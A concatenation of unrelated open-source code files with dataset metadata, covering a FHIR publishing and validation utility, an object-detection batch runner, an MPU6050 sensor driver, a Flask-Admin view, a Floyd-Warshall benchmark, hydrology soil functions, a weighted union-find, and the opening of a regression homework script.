"""
logger.info(
f"Begin publishing resources in {resource_file_or_dir} to {base_url}"
)
if username and password:
auth = HTTPBasicAuth(username, password)
elif oauth_url and oauth_client_id and oauth_client_secret:
auth = OAuth(oauth_url, oauth_client_id, oauth_client_secret, oauth_uma_audience)
else:
auth = None
client = FhirApiClient(
base_url=base_url, auth=auth, fhir_version=fhir_version
)
resources = loader.load_resources(resource_file_or_dir)
# Re-order resources according to submission order
resources_by_type = defaultdict(list)
for r_dict in resources:
resources_by_type[r_dict["resource_type"]].append(r_dict)
resources = []
for r_type in submission_order:
resources.extend(resources_by_type.pop(r_type, []))
for r_type, remaining in resources_by_type.items():
resources.extend(remaining)
# Delete existing resources
for r_dict in resources:
r = r_dict["content"]
if "url" in r:
success = client.delete_all(
f'{base_url}/{r["resourceType"]}', params={"url": r["url"]}
)
elif "id" in r:
success, results = client.send_request(
"delete", f'{base_url}/{r["resourceType"]}/{r["id"]}'
)
else:
logger.warning(
f'⚠️ Could not delete {r_dict["filename"]}. No way to '
"identify the resource. Tried looking for `url` and `id` in "
"payload."
)
# POST if no id is provided, PUT if id is provideds
for r_dict in resources:
r = r_dict["content"]
id_ = r.get("id")
if id_:
success, results = client.send_request(
"put", f'{base_url}/{r["resourceType"]}/{id_}', json=r
)
else:
success, results = client.send_request(
"post", f'{base_url}/{r["resourceType"]}', json=r
)
if not success:
errors = [
r
for r in results["response"]["issue"]
if r["severity"] == "error"
]
raise Exception(f"Publish failed! Caused by:\n{pformat(errors)}")
def _fhir_validate(ig_control_filepath, publisher_opts, refresh_publisher):
"""
Run the HL7 IG Publisher to do standard FHIR validation on resource files
Called in validate
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
:param publisher_opts: IG publisher command line options forwarded directly
to the publisher CLI
:type publisher_opts: str
:param refresh_publisher: A flag specifying whether to pull down the IG
publisher Docker image from the remote Docker repository before running
the IG publisher
:type refresh_publisher: boolean
"""
# Run IG publisher to do FHIR validation
args = [
RUN_IG_PUBLISHER_SCRIPT,
ig_control_filepath,
str(int(refresh_publisher)),
]
if publisher_opts:
args.append(publisher_opts)
subprocess.run(args, shell=False, check=True)
# Check QA report for validation errors
site_root = os.path.dirname(ig_control_filepath)
qa_path = os.path.join(site_root, "output", "qa")
qa_report = os.path.abspath(qa_path + ".html")
logger.info(f"Checking QA report {qa_report} for validation errors")
qa_json = read_json(qa_path + ".json")
if qa_json.get("errs"):
# Extract error messages from qa.txt
errors = []
with open(os.path.abspath(qa_path + ".txt")) as qa_txt:
for line in qa_txt.readlines():
ln = line.strip()
if ln.lower().startswith("error") and (".html" not in ln):
errors.append(ln)
errors = "\n".join(errors)
raise Exception(
f"Errors found in QA report. See {qa_report} for details:"
f"\n\n{errors}\n"
)
def _custom_validate(resource_dicts):
"""
Do custom validation of a resource file in the FHIR model
Called in validate
Validation Rules:
1. JSON paylod must have an `id` attribute populated with a value which
adheres to kebab-case
2. StructureDefinition must have `url` defined
3. StructureDefinition.id = StructureDefinition.url.split('/')[-1]
4. File name must follow format <resource type>-<resource id>
"""
for rd in resource_dicts:
res = rd["content"]
# Check if id is present
rid = res.get("id")
if not rid:
raise KeyError(
"All resources must have an `id` attribute. Resource file: "
f'{rd["filepath"]} is missing `id` or `id` is null.'
)
# If StructureDefinition check that URL is valid
if res["resourceType"] == "StructureDefinition":
if not res.get("url"):
raise KeyError(
"All StructureDefinition resources must have a `url`. "
f'Resource file: {rd["filepath"]} is missing `url` or '
"`url` is null."
)
url_parts = res.get("url").split("/")
if res["id"] != url_parts[-1]:
raise ValueError(
"Invalid value for `url` in StructureDefinition: "
f'{rd["filepath"]}. Value should be: '
f'{"/".join(url_parts + [res["id"]])}'
)
# Try to check if id follows kebab-case (won't be perfect)
expected_id = camel_to_snake(rid).replace("_", "-")
if rid != expected_id:
raise ValueError(
"Resource id must adhere to kebab-case (lowercase with "
f'hyphens between tokens). The `id` "{rid}" in '
f'{rd["filepath"]} should be: {expected_id}'
)
# Check filename
filename, ext = os.path.splitext(os.path.split(rd["filepath"])[-1])
rtype = rd.get("resource_type")
expected_filename = f"{rtype}-{rid}"
if filename != expected_filename:
raise ValueError(
"Resource file names must follow pattern: "
f"<resource type>-<resource id>.json. File {filename}{ext} "
f"should be: {expected_filename}{ext}"
)
logger.info(f"☑️ Initial validation passed for resource {filename + ext}")
def _update_ig_config(
resource_dicts, ig_resource_dict, add=True, rm_file=False
):
"""
Helper for update_ig_config
"""
# Collect resource ids from the input set of resources
resource_set = {
f'{r["content"]["resourceType"]}/{r["content"]["id"]}'
for r in resource_dicts
}
# Reformat IG resource list into a dict so its easier to update
ig_resource = ig_resource_dict["content"]
resources_dict = {}
for r in ig_resource["definition"]["resource"]:
# Only include resources from IG config that have corresponding filess
# Old IG entries will be discarded
key = r["reference"]["reference"]
if key in resource_set:
resources_dict[key] = r
else:
logger.info(f"🔥 Removing old entry {key} from IG")
for rd in resource_dicts:
if rd["resource_type"] == "ImplementationGuide":
continue
# Create the config entry
entry = _create_resource_config(rd, ig_resource.get("publisher"))
# Add/remove configuration entries
if add:
resources_dict[entry["reference"]["reference"]] = entry
else:
del rd[entry["reference"]["reference"]]
if rm_file:
os.rmfile(rd["filepath"])
logger.info(f'🗑 Deleted resource file {rd["filepath"]}')
logger.info(f'☑️ Added IG configuration for {rd["filename"]}')
# Format resource dict back to original list
ig_resource["definition"]["resource"] = [
resources_dict[k] for k in resources_dict
]
write_json(
ig_resource_dict["content"], ig_resource_dict["filepath"], indent=2
)
def _create_resource_config(resource_dict, publisher=""):
"""
Create the expected IG configuration entry for a resource
:param resource_dict: The resource payload from which a config entry will
be created. See ncpi_fhir_utility.loader.load_resources.
:type resource_dict: dict
:param publisher: The value of ImplementationGuide.publisher
:type publisher: str
:returns: IG config entry for the resource
"""
rid = resource_dict["content"].get("id")
rtype = resource_dict["content"].get("resourceType")
suffix = ""
if rtype in CONFORMANCE_RESOURCES:
is_example = False
base = resource_dict["content"].get("baseDefinition")
if base:
base = base.split("/")[-1]
suffix = f", Base: {base}"
else:
is_example = True
profiles = ",".join(
[
p.split("/")[-1]
for p in resource_dict["content"]
.get("meta", {})
.get("profile", [])
]
)
if profiles:
suffix = f", Profiles: {profiles}"
if publisher:
publisher = publisher + " "
return {
"reference": {"reference": f"{rtype}/{rid}"},
"name": f"{publisher}{rtype}/{rid}",
"description": f"{publisher}{rtype} {rid}{suffix}",
"exampleBoolean": is_example,
}
def _load_ig_resource_dict(ig_control_filepath):
"""
Load IG resource JSON into a dict
Find the location of the IG resource file from the ig control file first
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
:returns: IG resource dict
"""
# Read in ig control file
ig_control_filepath = os.path.abspath(
os.path.expanduser(ig_control_filepath)
)
ig_config = ConfigParser()
ig_config.read(ig_control_filepath)
# Read in ig resource file
ig_filepath = os.path.join(
os.path.split(ig_control_filepath)[0], dict(ig_config["IG"]).get("ig")
)
return loader.load_resources(ig_filepath)[0]
| 35.265136
| 114
| 0.647881
|
558c562a8f1a3cab94307152cc2642d4aff63ddf
| 1,610
|
py
|
Python
|
program/execute.py
|
alfanyRizaMahendra/tf2-object-detection-api
|
79a56f591744ae795b37b8c9c3ade212c37dba5f
|
[
"MIT"
] | null | null | null |
program/execute.py
|
alfanyRizaMahendra/tf2-object-detection-api
|
79a56f591744ae795b37b8c9c3ade212c37dba5f
|
[
"MIT"
] | null | null | null |
program/execute.py
|
alfanyRizaMahendra/tf2-object-detection-api
|
79a56f591744ae795b37b8c9c3ade212c37dba5f
|
[
"MIT"
] | null | null | null |
import subprocess
models = [
# 'faster-rcnn-resnet50-6000',
# 'faster-rcnn-resnet50-5000',
# 'faster-rcnn-resnet50-4000',
# 'ssd-mobilenet-v2-4000',
# 'ssd-mobilenet-v2-6000',
'ssd-mobilenet-v2-5000',
]
threshold_setup = [0.3]
test_images_folders = ['1', '2']
for threshold in threshold_setup:
# Generate string for threshold output folder
threshold_str = str(threshold)
threshold_str = threshold_str.replace('.', '_')
for folder in test_images_folders:
# Generate string for output folder
folder_subname = folder.replace('/', '_')
for model in models:
print('start executing [folder: ' + folder + '] ' + ' [threshold: ' + str(threshold) + ']: ' + model )
# Generate output directory
output_directory = 'output_' + folder_subname + '_' + threshold_str
# Generate command to execute [on terminal]
commmand_to_execute = 'python3 detect_objects.py --threshold ' + str(threshold) +' --model_path models/' + model + ' --path_to_labelmap models/shrimp-seed_label_map.pbtxt --images_dir data/' + folder +' --output_directory data/' + output_directory + '/' + model + ' --save_output'
subprocess_result = subprocess.check_output(commmand_to_execute, shell=True)
print('subprocess result:')
print(subprocess_result)
print('decode subprocess result:')
print(subprocess_result.decode('utf-8'))
print(model + ' [folder: ' + folder + '] ' + ' [threshold: ' + str(threshold) + ']: DONE!')
| 39.268293
| 292
| 0.61677
|
bd8410bfa585453f1b95ce7a697c3be34fa7c086
| 2,889
|
py
|
Python
|
ports/stm32/modules/ophyra_mpu60.py
|
Krasn4ck/micropython
|
3570ed274d8201d52dfebdb2cebc280d9f46d59c
|
[
"MIT"
] | null | null | null |
ports/stm32/modules/ophyra_mpu60.py
|
Krasn4ck/micropython
|
3570ed274d8201d52dfebdb2cebc280d9f46d59c
|
[
"MIT"
] | null | null | null |
ports/stm32/modules/ophyra_mpu60.py
|
Krasn4ck/micropython
|
3570ed274d8201d52dfebdb2cebc280d9f46d59c
|
[
"MIT"
] | 1
|
2021-03-25T16:47:07.000Z
|
2021-03-25T16:47:07.000Z
|
import pyb
import time
from pyb import I2C
class MPU6050_init(object):
def __init__(self):
self.saddres = 104
self.accel = 0
self.env_gyr = 0
self.env_accel = 0
self.gyr = 0
self.acel = 2
self.tem = 340
self.g = 0
self.y = 128
self.sen = 0
self.i2c = I2C(1, I2C.MASTER)
self.i2c.init(I2C.MASTER, baudrate=400000)
class MPU6050(MPU6050_init):
def init(self,accel, gyr):
if accel == 2:
self.env_accel = 0
self.g = 16384
elif accel == 4:
self.env_accel = 8
self.g = 8192
elif accel == 8:
self.env_accel = 16
self.g = 4096
else:
self.env_accel = 24
self.g = 2048
if gyr == 250:
self.env_gyr = 0
self.sen = 131
elif gyr == 500:
self.env_gyr = 8
self.sen = 65.5
elif gyr == 1000:
self.env_gyr = 16
self.sen = 32.8
else:
self.env_gyr = 24
self.sen = 16.4
self.i2c.mem_write(0, self.saddres, 107)
self.i2c.mem_write(self.env_accel, self.saddres, 28)
self.i2c.mem_write(self.env_gyr, self.saddres, 28)
def accX(self):
x=self.i2c.mem_read(2,self.saddres,59)
x=int.from_bytes(x,'big')
if x > 32767:
x = (65536 - x)*-1
return x/self.g
else:
return x/self.g
def accY(self):
x=self.i2c.mem_read(2,self.saddres,61)
x=int.from_bytes(x,'big')
if x > 32767:
x = (65536 - x)*-1
return x/self.g
else:
return x/self.g
def accZ(self):
x=self.i2c.mem_read(2,self.saddres,63)
x=int.from_bytes(x,'big')
if x > 32767:
x = (65536 - x)*-1
return x/self.g
else:
return x/self.g
def temp(self):
x = ord(self.i2c.mem_read(1,self.saddres,65))
x1 = ord(self.i2c.mem_read(1,self.saddres,66))
z2 = x << 8
x3 = z2 + x1
value = x3 / self.tem
value2 = value + 36.53
value3 = value2 / 10
return value3
def gyrX(self):
x=self.i2c.mem_read(2,self.saddres,67)
x=int.from_bytes(x,'big')
if x > 32767:
x = (65536 - x)*-1
return x/self.sen
else:
return x/self.sen
def gyrY(self):
x=self.i2c.mem_read(2,self.saddres,69)
x=int.from_bytes(x,'big')
if x > 32767:
x = (65536 - x)*-1
return x/self.sen
else:
return x/self.sen
def gyrZ(self):
x=self.i2c.mem_read(2, self.saddres, 71)
x=int.from_bytes(x,'big')
if x > 32767:
x = (65536 - x)*-1
return x/self.sen
else:
return x/self.sen
def write(self,num,addres):
self.i2c.mem_write(num,self.saddres,addres)
def read(self,addres):
x=ord(self.i2c.mem_read(1,self.saddres,addres))
return x
| 26.504587
| 60
| 0.527172
|
9b1f07f1dcfb26cf44440ec3dcb47abe34c92a22
| 1,559
|
py
|
Python
|
app/controllers/admin/uri_model_view.py
|
politeauthority/simple-honey
|
a875773c3299044b113c339203c909b6c4391fb4
|
[
"MIT"
] | null | null | null |
app/controllers/admin/uri_model_view.py
|
politeauthority/simple-honey
|
a875773c3299044b113c339203c909b6c4391fb4
|
[
"MIT"
] | 1
|
2021-06-01T21:43:04.000Z
|
2021-06-01T21:43:04.000Z
|
app/controllers/admin/uri_model_view.py
|
politeauthority/simple-honey
|
a875773c3299044b113c339203c909b6c4391fb4
|
[
"MIT"
] | null | null | null |
"""URI Model View
Admin view controller to display all registered and non registed uris in the Simple-Honey system.
"""
from flask_admin.form import SecureForm
from wtforms import validators
from app.controllers.admin.base_model_view import BaseModelView
from app.utilities import formatters
from app.utilities import admin_tools
class UriModelView(BaseModelView):
"""
View Class for URIs
"""
page_size = 25
column_type_formatters = admin_tools.default_column_formatters()
column_list = ['domain', 'uri', 'name', 'last_hit', 'hits', 'response_type']
column_formatters = dict(uri=formatters.uri_to_webrequest_links)
column_searchable_list = ['uri', 'name']
column_exclude_list = ['ts_updated']
column_default_sort = ('ts_updated', True)
form_base_class = SecureForm
form_excluded_columns = ['ts_created', 'ts_updated', 'last_hit', 'requests']
form_choices = {
'response_type': [
('', 'Blank Response'),
('file', 'Static file'),
('redirect', 'Redirect'),
('image_center', 'Image Centered'),
('raw_content', 'Raw Content'),
('custom_template', 'Custom Template'),
('markdown', 'Mark Down (.md)'),
('python_file', 'Custom Python File')
]
}
form_args = {
'uri': {
'label': 'Uri',
'validators': [validators.required()]
},
}
on_model_change = admin_tools.refresh_cache_file
# End File: simple-honey/app/controllers/admin/uri_model_view.py
| 31.816327
| 97
| 0.644003
|
38ba6fb8fb176bb844d5da48e2113a7681b3916a
| 6,816
|
py
|
Python
|
benchmarks/medley/floyd_warshall/floyd_warshall.py
|
MA2G1/polybench-python
|
a6fe1f505e1066fe703b15943836ea4eceeddd94
|
[
"Apache-2.0"
] | 2
|
2021-05-12T11:57:46.000Z
|
2022-01-12T12:14:17.000Z
|
benchmarks/medley/floyd_warshall/floyd_warshall.py
|
MA2G1/polybench-python
|
a6fe1f505e1066fe703b15943836ea4eceeddd94
|
[
"Apache-2.0"
] | null | null | null |
benchmarks/medley/floyd_warshall/floyd_warshall.py
|
MA2G1/polybench-python
|
a6fe1f505e1066fe703b15943836ea4eceeddd94
|
[
"Apache-2.0"
] | 2
|
2020-11-17T11:52:35.000Z
|
2021-12-15T07:41:10.000Z
|
# Copyright 2019 Miguel Angel Abella Gonzalez <miguel.abella@udc.es>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""<replace_with_module_description>"""
from benchmarks.polybench import PolyBench
from benchmarks.polybench_classes import ArrayImplementation
from benchmarks.polybench_classes import PolyBenchOptions, PolyBenchSpec
from numpy.core.multiarray import ndarray
class Floyd_warshall(PolyBench):
def __new__(cls, options: PolyBenchOptions, parameters: PolyBenchSpec):
implementation = options.POLYBENCH_ARRAY_IMPLEMENTATION
if implementation == ArrayImplementation.LIST:
return _StrategyList.__new__(_StrategyList, options, parameters)
elif implementation == ArrayImplementation.LIST_FLATTENED:
return _StrategyListFlattened.__new__(_StrategyListFlattened, options, parameters)
elif implementation == ArrayImplementation.NUMPY:
return _StrategyNumPy.__new__(_StrategyNumPy, options, parameters)
def __init__(self, options: PolyBenchOptions, parameters: PolyBenchSpec):
super().__init__(options, parameters)
# The parameters hold the necessary information obtained from "polybench.spec" file
params = parameters.DataSets.get(self.DATASET_SIZE)
if not isinstance(params, dict):
raise NotImplementedError(f'Dataset size "{self.DATASET_SIZE.name}" not implemented '
f'for {parameters.Category}/{parameters.Name}.')
# Set up problem size from the given parameters (adapt this part with appropriate parameters)
self.N = params.get('N')
def run_benchmark(self):
# Create data structures (arrays, auxiliary variables, etc.)
path = self.create_array(2, [self.N, self.N], self.DATA_TYPE(0))
# Initialize data structures
self.initialize_array(path)
# Benchmark the kernel
self.time_kernel(path)
# Return printable data as a list of tuples ('name', value).
# Each tuple element must have the following format:
# (A: str, B: matrix)
# - A: a representative name for the data (this string will be printed out)
# - B: the actual data structure holding the computed result
#
# The syntax for the return statement would then be:
# - For single data structure results:
# return [('data_name', data)]
# - For multiple data structure results:
# return [('matrix1', m1), ('matrix2', m2), ... ]
return [('path', path)]
class _StrategyList(Floyd_warshall):
def __new__(cls, options: PolyBenchOptions, parameters: PolyBenchSpec):
return object.__new__(_StrategyList)
def __init__(self, options: PolyBenchOptions, parameters: PolyBenchSpec):
super().__init__(options, parameters)
def initialize_array(self, path: list):
for i in range(0, self.N):
for j in range(0, self.N):
path[i][j] = i * j % 7 + 1
if (i + j) % 13 == 0 or (i + j) % 7 == 0 or (i + j) % 11 == 0:
path[i][j] = 999
def print_array_custom(self, path: list, name: str):
for i in range(0, self.N):
for j in range(0, self.N):
if (i * self.N + j) % 20 == 0:
self.print_message('\n')
self.print_value(path[i][j])
def kernel(self, path: list):
# scop begin
for k in range(0, self.N):
for i in range(0, self.N):
for j in range(0, self.N):
if path[i][j] < path[i][k] + path[k][j]:
path[i][j] = path[i][j]
else:
path[i][j] = path[i][k] + path[k][j]
# scop end
class _StrategyListFlattened(Floyd_warshall):
def __new__(cls, options: PolyBenchOptions, parameters: PolyBenchSpec):
return object.__new__(_StrategyListFlattened)
def __init__(self, options: PolyBenchOptions, parameters: PolyBenchSpec):
super().__init__(options, parameters)
def initialize_array(self, path: list):
for i in range(0, self.N):
for j in range(0, self.N):
path[self.N * i + j] = i * j % 7 + 1
if (i + j) % 13 == 0 or (i + j) % 7 == 0 or (i + j) % 11 == 0:
path[self.N * i + j] = 999
def print_array_custom(self, path: list, name: str):
for i in range(0, self.N):
for j in range(0, self.N):
if (i * self.N + j) % 20 == 0:
self.print_message('\n')
self.print_value(path[self.N * i + j])
def kernel(self, path: list):
# scop begin
for k in range(0, self.N):
for i in range(0, self.N):
for j in range(0, self.N):
if path[self.N * i + j] < path[self.N * i + k] + path[self.N * k + j]:
path[self.N * i + j] = path[self.N * i + j]
else:
path[self.N * i + j] = path[self.N * i + k] + path[self.N * k + j]
# scop end
class _StrategyNumPy(Floyd_warshall):
def __new__(cls, options: PolyBenchOptions, parameters: PolyBenchSpec):
return object.__new__(_StrategyNumPy)
def __init__(self, options: PolyBenchOptions, parameters: PolyBenchSpec):
super().__init__(options, parameters)
def initialize_array(self, path: ndarray):
for i in range(0, self.N):
for j in range(0, self.N):
path[i, j] = i * j % 7 + 1
if (i + j) % 13 == 0 or (i + j) % 7 == 0 or (i + j) % 11 == 0:
path[i, j] = 999
def print_array_custom(self, path: ndarray, name: str):
for i in range(0, self.N):
for j in range(0, self.N):
if (i * self.N + j) % 20 == 0:
self.print_message('\n')
self.print_value(path[i, j])
def kernel(self, path: ndarray):
# scop begin
for k in range(0, self.N):
for i in range(0, self.N):
for j in range(0, self.N):
if path[i, j] < path[i, k] + path[k, j]:
path[i, j] = path[i, j]
else:
path[i, j] = path[i, k] + path[k, j]
# scop end
| 40.094118
| 101
| 0.58304
|
74b7ccfd806fcd2f73f069a89330a6b5b3ca18e2
| 1,421
|
py
|
Python
|
Constants/colors.py
|
bahaozsahin/pygame-2048
|
ee2ff9f2766970c9f0ed64c249b3aa55252f561b
|
[
"MIT"
] | 1
|
2021-12-01T13:55:54.000Z
|
2021-12-01T13:55:54.000Z
|
Constants/colors.py
|
bahaozsahin/tkinter-2048
|
ee2ff9f2766970c9f0ed64c249b3aa55252f561b
|
[
"MIT"
] | 1
|
2021-04-11T11:47:56.000Z
|
2021-04-11T11:47:56.000Z
|
Constants/colors.py
|
bahaozsahin/tkinter-2048
|
ee2ff9f2766970c9f0ed64c249b3aa55252f561b
|
[
"MIT"
] | null | null | null |
#Used the same color scheme as the mobile game
class c:
GRID_COLOR = "#a39489"
EMPTY_CELL_COLOR = "#c2b3a9"
SCORE_LABEL_FONT = ("Verdana", 20)
SCORE_FONT = ("Helvetica", 32, "bold")
GAME_OVER_FONT = ("Helvetica", 48, "bold")
GAME_OVER_FONT_COLOR = "#ffffff"
WINNER_BG = "#ffcc00"
LOSER_BG = "#a39489"
CELL_COLORS = {
2: "#fcefe6",
4: "#f2e8cb",
8: "#f5b682",
16: "#f29446",
32: "#ff775c",
64: "#e64c2e",
128: "#ede291",
256: "#fce130",
512: "#ffdb4a",
1024: "#f0b922",
2048: "#fad74d"
}
CELL_NUMBER_COLORS = {
2: "#695c57",
4: "#695c57",
8: "#ffffff",
16: "#ffffff",
32: "#ffffff",
64: "#ffffff",
128: "#ffffff",
256: "#ffffff",
512: "#ffffff",
1024: "#ffffff",
2048: "#ffffff"
}
CELL_NUMBER_FONTS = {
2: ("Helvetica", 55, "bold"),
4: ("Helvetica", 55, "bold"),
8: ("Helvetica", 55, "bold"),
16: ("Helvetica", 50, "bold"),
32: ("Helvetica", 50, "bold"),
64: ("Helvetica", 50, "bold"),
128: ("Helvetica", 45, "bold"),
256: ("Helvetica", 45, "bold"),
512: ("Helvetica", 45, "bold"),
1024: ("Helvetica", 40, "bold"),
2048: ("Helvetica", 40, "bold")
}
| 27.326923
| 47
| 0.447572
|
f3f0d8992dad1fc6e02c6b841dff6ff5e43a677b
| 1,261
|
py
|
Python
|
wflow/wflow/sphy/subzone.py
|
quanpands/wflow
|
b454a55e4a63556eaac3fbabd97f8a0b80901e5a
|
[
"MIT"
] | null | null | null |
wflow/wflow/sphy/subzone.py
|
quanpands/wflow
|
b454a55e4a63556eaac3fbabd97f8a0b80901e5a
|
[
"MIT"
] | null | null | null |
wflow/wflow/sphy/subzone.py
|
quanpands/wflow
|
b454a55e4a63556eaac3fbabd97f8a0b80901e5a
|
[
"MIT"
] | null | null | null |
# -Function to calculate capillary rise
def CapilRise(pcr, subfield, subwater, capmax, rootwater, rootsat, rootfield):
subrelwat = pcr.max(pcr.min((subwater / subfield), 1), 0)
rootrelwat = pcr.max(pcr.min((rootwater / rootfield), 1), 0)
caprise = pcr.min(subwater, capmax * (1 - rootrelwat) * subrelwat)
caprise = pcr.min(
caprise, rootsat - rootwater
) # adding caprise can not exceed saturated rootwater content
return caprise
# -Function to calculate percolation from subsoil (only if groundwater module is used)
def SubPercolation(pcr, subwater, subfield, subTT, gw, gwsat):
subperc = pcr.ifthenelse(
(gw < gwsat) & ((subwater - subfield) > 0),
(subwater - subfield) * (1 - pcr.exp(-1 / subTT)),
0,
)
return subperc
# -Function to calculate drainage from subsoil (only if groundwater module is NOT used)
def SubDrainage(pcr, subwater, subfield, subsat, drainvel, subdrainage, subTT):
subexcess = pcr.max(subwater - subfield, 0)
subexcessfrac = subexcess / (subsat - subfield)
sublateral = subexcessfrac * drainvel
subdrainage = (sublateral + subdrainage) * (1 - pcr.exp(-1 / subTT))
subdrainage = pcr.max(pcr.min(subdrainage, subwater), 0)
return subdrainage
| 42.033333
| 87
| 0.684377
|
e181140acb8240d79762248b27716e5bbc667795
| 2,171
|
py
|
Python
|
metabolic_inefficiency/power_model.py
|
klarnemann/metabolic_inefficiency
|
3686497d99112b4f4a7e737247a42fa1f005c188
|
[
"MIT"
] | null | null | null |
metabolic_inefficiency/power_model.py
|
klarnemann/metabolic_inefficiency
|
3686497d99112b4f4a7e737247a42fa1f005c188
|
[
"MIT"
] | null | null | null |
metabolic_inefficiency/power_model.py
|
klarnemann/metabolic_inefficiency
|
3686497d99112b4f4a7e737247a42fa1f005c188
|
[
"MIT"
] | null | null | null |
import numpy as np
from scipy.optimize import curve_fit
def power_func(x, a, p):
'''
Power function of x, given parameters a and p.
Parematers
----------
x : numpy.ndarray, shape (n_voxels)
data
a : float
parameter
p : float
parameter'''
return a * x**p
def power_model(x_vars, y_vars, power_func):
'''Returns optimal parameters for power model of data.
x_vars : array-like, shape (n_voxels)
Training data
y_vars : array-like, shape (n_voxels)
Target values
power_func : function
Power function of x_vars, given a and p.'''
x_vars = np.array(x_vars, dtype=np.float64)
y_vars = np.array(y_vars, dtype=np.float64)
power_popt, _ = curve_fit(power_func, x_vars, y_vars)#fit power model
return power_popt
def leave_one_out_power_model(x_vars, y_vars, power_func=power_func, exclude_neighbors=True):
'''Iteratively runs power model, using a leave-one-subject-out approach.
x_vars : array-like, shape (n_voxels)
Training data
y_vars : array-like, shape (n_voxels)
Target values
power_func : function
Power function of x_vars, given a and p.
exclude_neighbors : bool
If true, exclude neighboring voxels from training data.'''
assert (len(x_vars) == len(y_vars)), 'Variables must have same length'
n_voxels = len(x_vars)
inds = np.arange(n_voxels)
# initiate output
loo_prediction = np.zeros(n_voxels)
loo_resid = np.zeros(n_voxels)
loo_a = np.zeros(n_voxels)
loo_p = np.zeros(n_voxels)
for i in np.arange(n_voxels):
if exclude_neighbors:
inds_mask = non_neighbor_mask(i)# remove to-be predicted voxel and its neighbors
else:
inds_mask = inds != i# remove to-be predicted voxel
p_opt = power_model(x_vars, y_vars, power_func)# fit model
# get model parameters
loo_a[i] = p_opt[0]
loo_p[i] = p_opt[1]
loo_prediction[i] = power_func(x_vars[i], *p_opt)# predicted values
loo_resid[i] = y_vars[i] - loo_prediction[i]# residual error
return loo_prediction, loo_resid, loo_a, loo_p
| 34.460317
| 93
| 0.65638
|
682f18abc4565dfe0582a01e84ef5cdbe8156f8c
| 3,761
|
py
|
Python
|
snippets/graph/weighted_unionfind.py
|
KATO-Hiro/Somen-Soupy
|
d9a3f44a3f4ab1a491b8fb2ef151966cce4804b1
|
[
"CC0-1.0"
] | 1
|
2021-05-04T01:33:17.000Z
|
2021-05-04T01:33:17.000Z
|
snippets/graph/weighted_unionfind.py
|
KATO-Hiro/Somen-Soupy
|
d9a3f44a3f4ab1a491b8fb2ef151966cce4804b1
|
[
"CC0-1.0"
] | 113
|
2019-06-08T11:50:10.000Z
|
2022-03-24T04:49:55.000Z
|
snippets/graph/weighted_unionfind.py
|
KATO-Hiro/Somen-Soupy
|
d9a3f44a3f4ab1a491b8fb2ef151966cce4804b1
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Usage:
n, m = map(int, input().split())
uf = WeightedUnionFind(n)
for i in range(m):
li, ri, wi = map(int, input().split())
li -= 1
ri -= 1
uf.merge_if_needs(li, ri, wi)
"""
class WeightedUnionFind:
"""Represents a data structure that tracks a set of elements partitioned
into a number of disjoint (non-overlapping) subsets.
Landau notation: O(α(n)), where α(n) is the inverse Ackermann function.
See:
https://www.youtube.com/watch?v=zV3Ul2pA2Fw
https://en.wikipedia.org/wiki/Disjoint-set_data_structure
https://atcoder.jp/contests/abc120/submissions/4444942
https://qiita.com/drken/items/cce6fc5c579051e64fab
"""
def __init__(self, number_count: int):
"""
Args:
number_count: The size of elements (greater than 2).
"""
self.parent_numbers = [i for i in range(number_count)]
self.rank = [0 for _ in range(number_count)]
self.diff_weight = [0 for _ in range(number_count)]
def find_root(self, number: int) -> int:
"""Follows the chain of parent pointers from number up the tree until
it reaches a root element, whose parent is itself.
Args:
number: The trees id (0-index).
Returns:
The index of a root element.
"""
if self.parent_numbers[number] == number:
return number
else:
parent_number = self.parent_numbers[number]
root = self.find_root(parent_number)
self.diff_weight[number] += self.diff_weight[parent_number]
self.parent_numbers[number] = root
return root
def calc_weight(self, number: int) -> int:
"""Calculate the weight of the node.
Args:
number: The trees id (0-index).
Returns:
The weight of the node.
"""
self.find_root(number)
return self.diff_weight[number]
def is_same_group(self, number_x: int, number_y: int) -> bool:
"""Represents the roots of tree number_x and number_y are in the same
group.
Args:
number_x: The trees x (0-index).
number_y: The trees y (0-index).
"""
return self.find_root(number_x) == self.find_root(number_y)
def merge_if_needs(self, number_x: int, number_y: int, weight: int) -> bool:
"""Uses find_root to determine the roots of the tree number_x and
number_y belong to. If the roots are distinct, the trees are
combined by attaching the roots of one to the root of the other.
Args:
number_x: The trees x (0-index).
number_y: The trees y (0-index).
weight : Cost between nodes.
"""
# Correct the difference between the weight of root and number_x,
# number_y.
weight += self.calc_weight(number_x)
weight -= self.calc_weight(number_y)
root_x, root_y = self.find_root(number_x), self.find_root(number_y)
if root_x == root_y:
return False
if self.rank[root_x] < self.rank[root_y]:
root_x, root_y = root_y, root_x
weight = -weight
if self.rank[root_x] == self.rank[root_y]:
self.rank[root_x] += 1
self.parent_numbers[root_y] = root_x
self.diff_weight[root_y] = weight
return True
def calc_cost(self, from_x: int, to_y: int) -> int:
"""Calculate cost between nodes.
Args:
from_x: The trees x (0-index).
to_y : The trees y (0-index).
Returns:
Cost between nodes.
"""
return self.calc_weight(to_y) - self.calc_weight(from_x)
| 33.580357
| 80
| 0.590534
|
9525bd141fd910a98a1f323f383e54aaf40d5452
| 1,426
|
py
|
Python
|
hw4/hw4-code-Q2.py
|
kgarg8/cs559-uic-neural-networks
|
49ff812b0b6ecc4bbfc5151fb435c3c70c1a63b4
|
[
"MIT"
] | null | null | null |
hw4/hw4-code-Q2.py
|
kgarg8/cs559-uic-neural-networks
|
49ff812b0b6ecc4bbfc5151fb435c3c70c1a63b4
|
[
"MIT"
] | null | null | null |
hw4/hw4-code-Q2.py
|
kgarg8/cs559-uic-neural-networks
|
49ff812b0b6ecc4bbfc5151fb435c3c70c1a63b4
|
[
"MIT"
] | null | null | null |
import math, numpy as np, matplotlib.pyplot as plt
np.random.seed(111)
x = np.array([i+1 for i in range(50)])
u = np.random.uniform(-1, 1, 50)
y = np.array([u_i + i + 1 for i, u_i in enumerate(u)])
N = len(x)
sum_x = np.sum(x)
sum_y = np.sum(y)
